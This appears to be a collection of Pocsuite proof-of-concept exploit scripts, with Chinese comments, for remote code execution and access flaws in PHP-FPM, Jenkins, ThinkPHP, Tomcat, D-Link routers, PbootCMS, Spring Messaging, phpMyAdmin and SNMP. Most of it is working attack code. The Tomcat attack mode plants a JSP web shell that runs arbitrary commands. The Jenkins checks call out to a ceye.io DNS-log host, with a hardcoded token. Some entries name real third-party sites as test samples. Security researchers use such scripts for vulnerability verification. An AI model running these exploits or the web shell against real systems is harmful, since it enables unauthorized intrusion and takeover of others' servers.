#!/usr/bin/python
# -*- coding: utf-8 -*-
from pocsuite3.api import register_poc
from pocsuite3.api import Output
from pocsuite3.api import POCBase
from urllib.parse import urlparse
from pocsuite3.api import requests as req
from pocsuite3.api import logger
import socket


class PhpUip():
    def __init__(self, url):
        self.MinQSL = 1500
        self.MaxQSL = 1950
        self.url = url
        self.BreakingPayload = "/PHP%0Ais_the_shittiest_lang.php"
        self.PossibleQSLs = []
        self.MaxPisosLength = 256
        self.qslandpisos = None

    def get_baseStatus(self):
        target = self.url + "/path%0Ainfo.php?{}".format('Q' * (self.MinQSL - 1))
        self.baseStatus = req.get(target).status_code

    def get_qsl(self):
        for qsl in range(self.MinQSL, self.MaxQSL, 5):
            resp = req.get(self.url + self.BreakingPayload + "?" + "Q" * (qsl - 1))
            if resp.status_code != self.baseStatus:
                self.PossibleQSLs = [qsl, qsl - 5, qsl - 10]

    def SanityCheck(self):
        header = {
            "D-Pisos": "8{}D".format("=" * self.MaxPisosLength)
        }
        for _ in range(10):
            if req.get(self.url + "/PHP%0ASOSAT?" + "Q" * (self.MaxQSL - 1),
                       headers=header).status_code == self.baseStatus:
                pass
            else:
                return False
        return True

    def get_pisos(self):
        host = urlparse(self.url).hostname
        port = urlparse(self.url).port
        for qsl in self.PossibleQSLs:
            for pisos in range(self.MaxPisosLength):
                try:
                    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                    head = "GET /index.php/PHP_VALUE%0Asession.auto_start=1;;;?{} HTTP/1.1\r\n".format("Q" * (qsl - 1))
                    head += "Host: {}:{}\r\n".format(host, str(port))
                    head += "User-Agent: Mozilla/5.0\r\n"
                    head += "D-Pisos: 8{}D\r\n".format("=" * pisos)
                    head += "Ebut: mamku tvoyu\r\n\r\n"
                    s.connect((host, port))
                    s.send(head.encode())
                    recv = s.recv(1024)
                    if b"PHPSESSID" in recv and b"path=" in recv:
                        self.qslandpisos = (qsl, pisos)
                        return
                    s.close()
                except Exception as e:
                    pass

    def poc(self):
        self.get_baseStatus()
        self.get_qsl()
        if self.PossibleQSLs:
            if self.SanityCheck():
                self.get_pisos()
                if self.qslandpisos:
                    return True
        return False


class PHPFPM(POCBase):
    vulID = 'N/A'  # ssvid
    version = '1.0'
    author = 'fairy'
    vulDate = '2019-10-25'
    createDate = ''
    updateDate = ''
    references = ['']
    name = 'php-fpm Remote Code Execution CVE-2019-11043'
    appPowerLink = ''
    appName = 'php-fpm and nginx'
    appVersion = 'all'
    vulType = 'rce'
    desc = ''' 
    PHP-fpm 远程代码执行漏洞(CVE-2019-11043)
    '''
    samples = ['']
    install_requires = ['']

    def _verify(self):
        result = {}
        test = PhpUip(self.url + '/index.php')
        if test.poc():
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Not vulnerability')
        return output

register_poc(PHPFPM)


#!/usr/bin/env python
#coding=utf-8

import random
import json
import time
from string import ascii_letters
import threading
import uuid
import subprocess
import os

from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE

# 需要CVE-2017-1000353-1.1-SNAPSHOT-all.jar包
# 

'''
CVE-2018-1000861
https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861
'''
class Jenkins_RCE_2018_1000861_POC(POCBase):
    vulID = 'Jenkins-CVE-2018-1000861'
    appName = 'Jenkins'
    appVersion = 'Jenkins weekly <= 2.153; Jenkins LTS <= 2.138.3'
    category = POC_CATEGORY.EXPLOITS.REMOTE
    vulType = VUL_TYPE.CODE_EXECUTION
    vulDate = '2018-12-05'  # 漏洞公开的时间,不知道就写今天
    author = 'shadowsock5'  # PoC作者的大名
    createDate = '2019-02-24'  # 编写 PoC 的日期
    updateDate = '2020-02-24'  # PoC 更新的时间,默认和编写时间一样
    references = ['https://jenkins.io/security/advisory/2018-12-05/#SECURITY-595']  # 漏洞地址来源,0day不用写
    name = 'Jenkins RCE CVE-2018-1000861'  # PoC 名称
    install_requires = []  # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"高危"

    
    # 使用随机字符串作为banner，通过ceye的接口判断命令是否被执行
    DOMAIN = 'wvg689.ceye.io'
    TOKEN = '76dce59a986eab595838f7dc74903035'
    BANNER = ''.join([random.choice(ascii_letters) for i in range(6)])
    CEYE_URL = 'http://api.ceye.io/v1/records?token={0}&type=dns&filter={1}'.format(TOKEN, BANNER)

    http_proxy  = "http://127.0.0.1:8087"
    proxies = {"http": http_proxy, "https": http_proxy}

    def _verify(self):
        result={}

        vul_url = self.url
        target_url = vul_url
        
        #command = "'ping {0}.{1}'".format(self.BANNER, self.DOMAIN)
        command = "touch /tmp/jenkins_{0}".format(self.BANNER)

        payload_url = vul_url + '/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript' + \
        '?sandbox=true&value=' + \
        'public class x %7b public x()%7b"{0}".execute()%7d%7d'.format(command)
        
        try:
            req.get(payload_url, proxies=self.proxies)
        except Exception as e:
            e.printStackTrace()
        
        time.sleep(2) # 休眠2s等待ceye生成记录
        if self.test_dnslog(self.CEYE_URL):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = target_url
            return self.save_output(result)
        return self.save_output(result)

    # 验证DNS已被解析，命令执行
    def test_dnslog(self, url):
        resp = req.get(url)
        d = resp.json()
        try:
            name = d['data'][0]['name']
            if self.BANNER in name:
                return True
        except Exception:
            return False            

    # 攻击模块
    def _attack(self):
        return self._verify()

    # 输出报告
    def save_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output


'''
CVE-2017-1000353
https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2017-1000353
'''
class Jenkins_RCE_2017_1000353_POC(POCBase):
    vulID = 'Jenkins-CVE-2017-1000353'
    appName = 'Jenkins'
    appVersion = 'Jenkins主版本 <=2.56版本; Jenkins LTS  <=2.46.1版本'
    category = POC_CATEGORY.EXPLOITS.REMOTE
    vulType = VUL_TYPE.CODE_EXECUTION
    vulDate = '2017-04-26'  # 漏洞公开的时间,不知道就写今天
    author = 'shadowsock5'  # PoC作者的大名
    createDate = '2019-02-24'  # 编写 PoC 的日期
    updateDate = '2020-02-24'  # PoC 更新的时间,默认和编写时间一样
    references = ['https://jenkins.io/security/advisory/2017-04-26/#cli-unauthenticated-remote-code-execution']  # 漏洞地址来源,0day不用写
    name = 'Jenkins反序列化RCE'  # PoC 名称
    install_requires = []  # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"高危"

    
    # 使用随机字符串作为banner，通过ceye的接口判断命令是否被执行
    DOMAIN = 'wvg689.ceye.io'
    TOKEN = '76dce59a986eab595838f7dc74903035'
    BANNER = ''.join([random.choice(ascii_letters) for i in range(6)])
    CEYE_URL = 'http://api.ceye.io/v1/records?token={0}&type=dns&filter={1}'.format(TOKEN, BANNER)

    PREAMLE = b'<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4='
    PROTO = b'\x00\x00\x00\x00'
    FILE_SER = None

    http_proxy  = "http://127.0.0.1:8087"
    proxies = {"http": http_proxy, "https": http_proxy}


    def _verify(self):
        result={}

        vul_url = self.url + "/cli"
        target_url = self.url

        host = vul_url.strip("http://").strip("https://").split(':')[0]
        port = vul_url.strip("http://").strip("https://").split(':')[1]
        
        # 云上JAR包文件路径
        JAR_PATH = "~/GitProjects/vulhub/jenkins/CVE-2017-1000353/CVE-2017-1000353-1.1-SNAPSHOT-all.jar"

        #payload = "/System/Applications/Calculator.app/Contents/MacOS/Calculator"
        payload = "'ping {0}.{1}'".format(self.BANNER, self.DOMAIN)
        #payload = "'touch /tmp/jenkins_{0}'".format(self.BANNER)

        out_ser = "jenkins_poc.ser"

        command1 = "java -jar {0} {1} {2}".format(JAR_PATH, out_ser, payload)

        # 第一步，根据payload生成序列化文件
        pro = subprocess.Popen(command1,
                stdout=subprocess.PIPE,shell=True, preexec_fn=os.setsid)
        print(command1)
        
        try:
            # 读取第一步生成的序列化文件
            with open(out_ser, "rb") as f:
                self.FILE_SER = f.read()
            
            session = str(uuid.uuid4())
            t = threading.Thread(target=self.download, args=(vul_url, session))
            t.start()

            self.upload_chunked(vul_url, session, "asdf")
        except Exception as e:
            e.printStackTrace()
        
        time.sleep(2) # 休眠2s等待ceye生成记录
        if self.test_dnslog(self.CEYE_URL):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = target_url
            return self.save_output(result)
        return self.save_output(result)


    def null_payload(self):
        yield b" "


    def generate_payload(self):
        payload = self.PREAMLE + self.PROTO + self.FILE_SER
        return payload


    def generate_payload_chunked(self):
        yield self.PREAMLE
        yield self.PROTO
        yield self.FILE_SER


    def download(self, url, session):
        headers = {'Side' : 'download'}
        headers['Content-type'] = 'application/x-www-form-urlencoded'
        headers['Session'] = session
        headers['Transfer-Encoding'] = 'chunked'
        r = req.post(url, data=self.null_payload(), headers=headers, proxies=self.proxies, stream=True, verify=False)
        #print(r.content)


    def upload(url, session, data):
        headers = {'Side' : 'upload'}
        headers['Session'] = session
        headers['Content-type'] = 'application/octet-stream'
        headers['Accept-Encoding'] = None
        r = req.post(url, data=data, headers=headers, proxies=self.proxies, verify=False)


    def upload_chunked(self, url,session, data):
        headers = {'Side' : 'upload'}
        headers['Session'] = session
        headers['Content-type'] = 'application/octet-stream'
        headers['Accept-Encoding']= None
        headers['Transfer-Encoding'] = 'chunked'
        headers['Cache-Control'] = 'no-cache'
        r = req.post(url, headers=headers, data=self.generate_payload_chunked(), proxies=self.proxies, verify=False)


    # 验证DNS已被解析，命令执行
    def test_dnslog(self, url):
        resp = req.get(url)
        d = resp.json()
        try:
            name = d['data'][0]['name']
            if self.BANNER in name:
                return True
        except Exception:
            return False            

    # 攻击模块
    def _attack(self):
        return self._verify()

    # 输出报告
    def save_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output

# 注册类
register_poc(Jenkins_RCE_2018_1000861_POC)
register_poc(Jenkins_RCE_2017_1000353_POC)





#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""

from pocsuite.api.request import req 
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase

class ThinkphpPOC(POCBase):
    vulID = '4'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1' #默认为1
    vulDate = '2017-03-01' #漏洞公开的时间,不知道就写今天

    author = 'ly55521' #  PoC作者的大名
    createDate = '2017-03-01'# 编写 PoC 的日期
    updateDate = '2017-03-01'# PoC 更新的时间,默认和编写时间一样
    references = 'http://0535code.com/'# 漏洞地址来源,0day不用写
    name = 'Thinkphp Command execution'# PoC 名称
    appPowerLink = 'http://www.thinkphp.cn/'# 漏洞厂商主页地址
    appName = 'Thinkphp'# 漏洞应用名称
    appVersion = 'Thinkphp 0.0-3.1 Lite'# 漏洞影响版本
    vulType = 'code-exec'#漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        Thinkphp正则-e模式代码执行漏洞
    ''' # 漏洞简要描述
    samples = ["http://down.51cto.com/data/283085","/examples/Blog/index.php"]# 测试样列,就是用 PoC 测试成功的网站
    install_requires = [] # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"严重" #严重,高危,中危,低危

    #验证漏洞 pocsuite -r 4-thinkphp-getshell.py -u 1.1.1.1 --verify
    def _verify(self):
        #定义返回结果
        result = {}
        #获取漏洞url
        import urlparse
        vul_url = urlparse.urlparse(self.url).scheme + "://" + urlparse.urlparse(self.url).netloc
        send_payload = "/index.php/module/aciton/param1/${@phpinfo()}"
        url = vul_url + send_payload
        #print url

        try:
            r = req.get(url=url, timeout=5,allow_redirects=False) #禁止重定向
            if r.status_code == 200 and "<title>phpinfo()</title>" in r.text:
                #print u"存在漏洞"
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = vul_url
                result['VerifyInfo']['Payload'] = send_payload
            else:
                result = {}

        except Exception as e:
            #print "error!"
            result = {}
        print('[+]4 poc done')
        return self.save_output(result)

    #漏洞攻击
    def _attack(self):
        result = {}
        # 攻击代码
        # /index.php/module/action/param1/{${eval($_POST[cmd])}}
        return self._verify()

    def save_output(self, result):
        #判断有无结果并输出
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output

register(ThinkphpPOC)




#!/usr/bin/python
# -*- coding:utf-8 -*-

import string
import time
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    name = 'phpmyadmin_weak_password'
    vulID = '0'
    author = ['LRestless']
    vulType = 'weak-pass'
    version = '1'
    references = ['']
    desc = u'''用PHP语言所写的phpMyAdmin，提供了一个基于Web界面的MySQL数据库管理应用程序。最初MySQL的root帐户密码是空的，所以任何人都可以连接到MySQL服务器的根目录，不用密码，并授予所有权限。'''

    vulDate = '2015-06-18'
    createDate = '2019-03-19'
    updateDate = '2019-03-20'

    appName = 'PhpMyadmin'
    appVersion = 'X'
    appPowerLink = 'https://www.phpmyadmin.net/'
    samples = ['']

    def _attack(self):
        """attack mode"""
        return self._verify()
        pass

    def _verify(self):
        """verify  mode"""
        result = {}
        resp = req.post(self.url)
        time.sleep(2)
        if 'information_schema' in resp.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)




#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""

from pocsuite.api.request import req 
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase

import urlparse

class TomcatPOC(POCBase):
    vulID = '18'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1' #默认为1
    vulDate = '2017-10-27' #漏洞公开的时间,不知道就写今天

    author = 'ly55521' #  PoC作者的大名
    createDate = '2017-10-27'# 编写 PoC 的日期
    updateDate = '2017-10-27'# PoC 更新的时间,默认和编写时间一样
    references = 'https://github.com/cyberheartmi9/CVE-2017-12617/blob/master/tomcat-cve-2017-12617.py','http://www.freebuf.com/vuls/150203.html'# 漏洞地址来源,0day不用写
    name = 'tomcat Unauthorized PUT'# PoC 名称
    appPowerLink = 'http://tomcat.apache.org/'# 漏洞厂商主页地址
    appName = 'tomcat'# 漏洞应用名称
    appVersion = 'Apache Tomcat 7.0.0 - 7.0.81'# 漏洞影响版本
    vulType = 'cmd-exec'#漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        CVE-2017-12617 tomcat PUT 漏洞；
    ''' # 漏洞简要描述
    samples = []# 测试样列,就是用 PoC 测试成功的网站
    install_requires = [] # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"严重" #严重,高危,中危,低危

    #如果设置端口则取端口,没有设置则为默认端口
    def host_port(self,vul_url):
        import re
        from pocsuite.lib.utils.funs import url2ip
        _port = re.findall(':(\d+)\s*', vul_url)
        if len(_port) != 0:
            _host = url2ip(vul_url)[0]
            _port = url2ip(vul_url)[1]
        else :
            _host = url2ip(vul_url)
            _port = "8080"
        #组装 http, https会出现问题
        vul_url = "http://"+_host+":"+_port
        return vul_url

    #验证漏洞 pocsuite -r 18-tomcat-CVE201712617.py -u 1.1.1.1 --verify
    def _verify(self):
        #定义返回结果
        result = {}
        #获取漏洞url
        vul_url = '%s' % self.url

        #获取处理后的url
        vul_url = self.host_port(vul_url)

        #定义poc路径和payload
        poc_path = urlparse.urljoin(vul_url,"test.txt")
        payload = "this is Vulnerable cve201712617!"

        #检测漏洞
        try:
            #print urlparse.urljoin(vul_url,poc_name)
            poc_req = req.put(url = poc_path,data = payload, verify = False)
            #print poc_req.content
            poc_content = req.get(url = poc_path).content
            #print poc_content
            if 'cve201712617' in poc_content:
                #print u'\n【警告】' + vul_url + "【存在漏洞】"
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = poc_path
                result['VerifyInfo']['Payload'] = payload
            else:
                #print u'\n【不存在漏洞】 ' + vul_url
                pass
        except:
            # return vul_url
            pass
        print('[+]18 poc done')
        return self.save_output(result)

    #漏洞攻击 pocsuite -r 15-tomcat-CVE201712617.py -u 10.74.52.91 --attack
    def _attack(self):
        #定义返回结果
        result = {}
        #获取漏洞url
        vul_url = '%s' % self.url

        #获取处理后的url
        vul_url = self.host_port(vul_url)

        #定义poc文件名和payload
        poc_name = "cmd.jsp"
        payload = """
        <%
            if("023".equals(request.getParameter("pwd"))){
                java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
                int a = -1;
                byte[] b = new byte[2048];
                out.print("<pre>");
                while((a=in.read(b))!=-1){
                    out.println(new String(b));
                }
                out.print("</pre>");
            }
        %>
        """

        #上传jsp会发生问题,必要时手工尝试 完善exp规则
        poc_req = req.put(url = urlparse.urljoin(vul_url,poc_name),data = payload, verify = False)
        exp = urlparse.urljoin(vul_url,poc_name)+"?pwd=023&i=whoami"
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = urlparse.urljoin(vul_url,poc_name)
        result['VerifyInfo']['Payload'] = exp

        return self.save_output(result)

    def save_output(self, result):
        #判断有无结果并输出
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output

register(TomcatPOC)





"""
PoC 编写规范及要求说明 https://github.com/knownsec/Pocsuite/blob/master/docs/CODING.md

使用方法 https://github.com/knownsec/Pocsuite/blob/master/docs/translations/USAGE-zh.md

集成 Pocsuite https://github.com/knownsec/Pocsuite/blob/master/docs/INTEGRATE.md

批量验证 pocsuite -r 18-tomcat-CVE201712617.py --verify -f results.txt --threads 10 --report report.html

"""


#!/usr/bin/python
# -*- coding: utf-8 -*-


# If you have issues about development, please read:
# https://github.com/knownsec/Pocsuite/blob/master/docs/CODING.md
# https://github.com/knownsec/Pocsuite/blob/master/docs/COPYING

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


def send_command(url, cmd):
    try:
        httpreq = req.Session()
        headers = {'Content-Type': 'application/x-www-form-urlencoded',
                   'User-Agent': 'GoogleSpider'}
        resp = httpreq.post(url, headers=headers, data='cmd=%s' % cmd)
    except:
        resp = None
    return resp


class TestPOC(POCBase):
    name = 'Multiple Vulnerabilities in D-Link DIR-600 and DIR-300'
    vulID = '78176'  # https://www.seebug.org/vuldb/ssvid-78176
    author = ['debug']
    vulType = 'cmd-exec'
    version = '1.0'  # default version: 1.0
    references = ['http://www.s3cur1ty.de/m1adv2013-003']
    desc = '''The vulnerability is caused by missing access
           restrictions and missing input validation in the cmd
           parameter (command.php) and can be exploited to inject
           and execute arbitrary shell commands.'''

    vulDate = '2013-02-14'
    createDate = '2013-02-14'
    updateDate = '2013-02-14'

    appName = 'D-Link'
    appVersion = 'DIR-300, DIR-600'
    appPowerLink = ''
    samples = ['']

    def _attack(self):
        '''attack mode'''
        return self._verify()

    def _verify(self):
        '''verify mode'''
        result = {}
        self.url = self.url + '/command.php'

        resp = send_command(self.url, 'date +%Y%m%d')
        if resp and resp.text and resp.status_code == 200:
            date = resp.text.strip()
            if len(date) == 8 and date.isdigit():
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/python
# -*- coding:utf-8 -*-

import string
import random
import time
import re
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    name = 'pbootcms1.2.1 Remote Code Execution Vulnerability'
    vulID = '0'
    author = ['cws6']
    vulType = 'code-exec'
    version = '1'
    references = ['https://xz.aliyun.com/t/3533']
    desc = '''pbootcms< v1.3.2 前台存在任意代码执行'''

    vulDate = '2018-05-21'
    createDate = '2019-04-03'
    updateDate = '2019-04-03'

    appName = 'pbootcms'
    appVersion = '< v1.3.2'
    appPowerLink = 'https://www.pbootcms.com/'
    samples = ['re']

    
    def _attack(self):
        """attack mode"""
        connect = '/index/index'
        result = {}
        payload1 = '/index.php'
        payload2 = '?s={pboot:if(eval($_GET[1]));//)})}}{/pboot:if}&1=phpinfo();'
        resp = req.get(self.url + payload1 + connect + payload2)
        time.sleep(2)
        if 'phpinfo' in resp.content:
            print("OK")
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        return self.parse_output(result)

    def _verify(self):
        """verify mode"""
        connect = '/index/index'
        result = {}
        payload1 = '/index.php'
        payload2 = '?s={pboot:if(eval($_GET[1]));//)})}}{/pboot:if}&1=system(id);'
        resp = req.get(self.url + payload1 + connect + payload2)
        data = re.findall("uid", resp.content)
        if data:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url

        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)




#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""

from pocsuite.api.request import req 
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase


class DirlistPOC(POCBase):
    vulID = '12'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1' #默认为1
    vulDate = '2017-06-26' #漏洞公开的时间,不知道就写今天

    author = 'ly55521' #  PoC作者的大名
    createDate = '2017-06-26'# 编写 PoC 的日期
    updateDate = '2017-06-26'# PoC 更新的时间,默认和编写时间一样
    references = 'http://0535code.com/article/20170626_1829.shtml'# 漏洞地址来源,0day不用写
    name = 'Parent Directory info'# PoC 名称
    appPowerLink = '#'# 漏洞厂商主页地址
    appName = '#'# 漏洞应用名称
    appVersion = 'all versions'# 漏洞影响版本
    vulType = 'info-disclosure'#漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        目录列表漏洞
    ''' # 漏洞简要描述
    samples = ["http://hypem.com/download/",]# 测试样列,就是用 PoC 测试成功的网站
    install_requires = [] # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"高危" #严重,高危,中危,低危

    #验证漏洞 pocsuite -r 12-Directory-list-info.py -u hypem.com --verify
    def _verify(self):
        #定义返回结果
        result = {}
        #获取漏洞url
        vul_url = '%s' % self.url

        r = req.get(vul_url)
        r_content = r.content
        import re
        title =re.findall(r"<title>(.*)</title>",r_content)[0]
        #print title
        if "Index of" in title:
            #print u"发现漏洞"
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vul_url
            result['VerifyInfo']['Payload'] = vul_url + str(r_content)             
        #print r_content
        #from bs4 import BeautifulSoup
        #soup = BeautifulSoup(r_content,'html.parser')
        #print soup.h1.string
        print('[+]12 poc done')
        return self.save_output(result)

    #漏洞攻击
    def _attack(self):
        result = {}
        # 攻击代码
        return self._verify()

    def save_output(self, result):
        #判断有无结果并输出
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output

register(DirlistPOC)




#!/usr/bin/python
# -*- coding: utf-8 -*-
# from pocsuite.api.request import req #用法和 requests 完全相同
# from pocsuite.api.poc import register
# from pocsuite.api.poc import Output, POCBase
import requests as req
from pocsuite3.api import POCBase, Output, register_poc as register
import random
import string
import time
import threading
import json

# logging.basicConfig(stream=sys.stdout, level=logging.INFO)

def random_str(length):
    letters = string.ascii_lowercase + string.digits
    return ''.join(random.choice(letters) for c in range(length))

class SockJS(threading.Thread):
    def __init__(self, url, *args, **kwargs):
        super(SockJS,self).__init__(*args, **kwargs)
        self.base = '{}/{}/{}'.format(url,random.randint(0, 1000),random_str(8))
        self.daemon = True
        self.session = req.session()
        self.session.headers = {
            'Referer': url,
            'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'
        }
        self.t = int(time.time() * 1000)
    def run(self):
        url = '{}/htmlfile?c=_jp.vulhub'.format(self.base)
        response = self.session.get(url, stream=True)
        for line in response.iter_lines():
            time.sleep(0.5)
    def send(self, command, headers, body=''):
        flag=False
        data = [command.upper(), '\n']
        data.append('\n'.join(['{}:{}'.format(k,v) for k, v in headers.items()]))
        data.append('\n\n')
        data.append(body)
        data.append('\x00')
        data = json.dumps([''.join(data)])
        response = self.session.post('{}/xhr_send?t={}'.format(self.base,self.t), data=data)
        if response.status_code != 204:
            # logging.info(f"send '{command}' data error.")
            pass
        else:
            flag=True
            # logging.info(f"send '{command}' data success.")
        return flag

    def __del__(self):
        self.session.close()

def poc_start(url):
    sockjs = SockJS(url)
    sockjs.start()
    time.sleep(1)

    flag1=sockjs.send('connect', {
        'accept-version': '1.1,1.0',
        'heart-beat': '10000,10000'
    })
    # 在tmp目录下创建success文件
    flag2=sockjs.send('subscribe', {
        'selector': "T(java.lang.Runtime).getRuntime().exec('touch /tmp/success')",
        'id': 'sub-0',
        'destination': '/topic/greetings'
    })

    data = json.dumps({'name': 'vulhub'})
    flag3=sockjs.send('send', {
        'content-length': len(data),
        'destination': '/app/hello'
    }, data)
    return [flag1,flag2,flag3]

def poc(url):
    if not url.startswith("http"):
        url = "http://" + url
    if "/" in url:
        url += '/gs-guide-websocket'
    try:
        response=poc_start(url)
    except Exception:
        response = ""
    return response


class TestPOC(POCBase):
    name = 'Spring Messaging_RCE_CVE-2018-1270'
    vulID = 'CVE-2018-1270'  #https://www.seebug.org/vuldb/ssvid-97214
    author = ['debug']
    vulType = 'RCE'
    version = '1.0'  # default version: 1.0
    references = ['https://www.anquanke.com/post/id/104926']
    desc = '''
		   spring messaging为spring框架提供消息支持，其上层协议是STOMP，底层通信基于SockJS，
           在spring messaging中，其允许客户端订阅消息，并使用selector过滤消息。
           selector用SpEL表达式编写，并使用`StandardEvaluationContext`解析，造成命令执行漏洞。
            参考链接：
            - https://pivotal.io/security/cve-2018-1270
            - https://xz.aliyun.com/t/2252
            - https://cert.360.cn/warning/detail?id=3efa573a1116c8e6eed3b47f78723f12
            - https://github.com/CaledoniaProject/CVE-2018-1270
		   '''
    vulDate = '2020-02-05'
    createDate = '2020-02-05'
    updateDate = '2020-02-05'
    appName = 'Spring Messaging'
    appVersion = '5.0 to 5.0.4,4.3 to 4.3.14'
    appPowerLink = ''
    samples = ['']

    def _attack(self):
        '''attack mode'''
        return self._verify()

    def _verify(self):
        '''verify mode'''
        result = {}
        response = poc(self.url)
        if response[0] == response[1] == response[2] == True:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url + 'Spring Messaging_RCE_CVE-2018-1270' + ' is exist!'
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output

register(TestPOC)


#!/usr/bin/env python
# coding: utf-8
from pysnmp.hlapi import getCmd, SnmpEngine, CommunityData, UdpTransportTarget, ContextData, ObjectType, ObjectIdentity
from urllib.parse import urlparse
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE


class TestPOC(POCBase):
    vulID = '0'
    version = '1.0'
    author = 'hancool'
    vulDate = '2019-1-8'
    createDate = '2019-1-8'
    updateDate = '2019-1-8'
    references = ['', ]
    name = 'SNMP unauthorized access'
    appPowerLink = ''
    appName = 'All'
    appVersion = 'v2'
    vulType = VUL_TYPE.UNAUTHORIZED_ACCESS
    category = POC_CATEGORY.EXPLOITS.REMOTE
    install_requires = ['pysnmp']
    desc = '''
    SNMP Community默认设置，攻击者可通过该漏洞泄露网络设备的敏感信息。
    '''

    def _verify(self):
        def test_snmp(target, port=161, community='public'):
            try:
                errorIndication, errorStatus, errorIndex, varBinds = next(
                    getCmd(SnmpEngine(),
                           # mpModel -> 0:v1,1:v2c
                           CommunityData(community, mpModel=1),
                           UdpTransportTarget(
                               (target, int(port)), timeout=1, retries=1),
                           ContextData(),
                           ObjectType(ObjectIdentity(
                               'SNMPv2-MIB', 'sysDescr', 0)),
                           ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysName', 0)))
                )
                if errorIndication:
                    return (False, errorIndication)
                elif errorStatus:
                    msg = '%s at %s' % (errorStatus.prettyPrint(
                    ), errorIndex and varBinds[int(errorIndex) - 1][0] or '?')
                    return (False, msg)
                else:
                    result = []
                    for varBind in varBinds:
                        result.append(' = '.join(
                            [x.prettyPrint() for x in varBind]))
                    return (True, result)
            except Exception as e:
                # raise
                return (False, str(e))

        result = {}
        pr = urlparse(self.url)
        if pr.port:  # and pr.port not in ports:
            ports = [pr.port]
        else:
            ports = [161]
        for port in ports:
            try:
                status, msg = test_snmp(pr.hostname, port)
                if status:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = '{}:{}'.format(
                        pr.hostname, port)
                    result['extra'] = {}
                    result['extra']['evidence'] = msg
                    break
            except:
                # raise
                pass

        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not vulnerability')
        return output


register_poc(TestPOC)



